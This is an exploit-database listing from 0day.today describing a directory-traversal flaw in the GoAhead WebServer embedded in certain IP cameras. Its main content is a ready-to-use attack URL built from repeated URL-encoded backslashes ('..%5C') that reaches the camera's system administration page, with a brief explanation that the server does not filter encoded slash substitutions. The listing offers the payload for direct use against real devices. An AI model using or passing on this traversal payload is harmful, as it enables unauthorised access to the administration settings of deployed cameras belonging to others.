[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability

Author
William Reyor
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10948
Category
web applications
Date add
17-02-2010
Platform
unsorted
=====================================================================
GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability
=====================================================================

simply go to http://ipaddress of
camera/..%5C..%5C..%5C..%5C..%5C..%5C/config/tcfg_system.asp (system
administration page)

These cams use an embedded version of GoAhead WebServer which is
vulnerable to the above attack because they don't correctly filter URL
encoded substitutions for the '/' character. Original vulnerability
and further explanation posted here:
http://www.securityfocus.com/bid/5197/info

William Reyor


-- 
Genius is one percent inspiration and ninety-nine percent perspiration.




#  0day.today [2024-11-15]  #